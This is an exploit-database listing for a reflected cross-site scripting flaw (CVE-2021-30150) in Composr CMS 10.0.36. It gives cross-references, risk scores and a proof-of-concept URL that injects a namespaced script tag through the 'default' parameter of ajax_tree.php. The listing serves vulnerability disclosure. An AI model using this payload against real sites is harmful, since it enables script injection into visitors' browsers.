Composr CMS 10.0.36 - Cross Site Scripting Vulnerability

🗓️ 07 Apr 2021 00:00:00Reported by zdtType

zdt🔗 0day.today👁 46 Views

Composr CMS 10.0.36 - Cross Site Scripting Vulnerability in ajax_tree.ph

Reporter	Title	Published	Views	Family All 11
Circl	CVE-2021-30150	5 Jul 202204:32	–	circl
CNNVD	Composr CMS 跨站脚本漏洞	6 Apr 202100:00	–	cnnvd
CNVD	Composr Cross-Site Scripting Vulnerability	7 Apr 202100:00	–	cnvd
CVE	CVE-2021-30150	6 Apr 202105:40	–	cve
Cvelist	CVE-2021-30150	6 Apr 202105:40	–	cvelist
Exploit DB	Composr CMS 10.0.36 - Cross Site Scripting	7 Apr 202100:00	–	exploitdb
EUVD	EUVD-2021-17087	7 Oct 202500:30	–	euvd
NVD	CVE-2021-30150	6 Apr 202106:15	–	nvd
Packet Storm	Composr CMS 10.0.36 Cross Site Scripting	7 Apr 202100:00	–	packetstorm
Prion	Design/Logic Flaw	6 Apr 202106:15	–	prion

# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting
# Exploit Author: Orion Hridoy
# Vendor Homepage: https://compo.sr/
# Software Link: https://compo.sr/download.htm
# Version: 10.0.36
# Tested on: Windows/Linux
# CVE : CVE-2021-30150

Vulnerable Endpoint:
https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>

#  0day.today [2021-10-13]  #

07 Apr 2021 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 24.3

CVSS 3.16.1

EPSS0.00321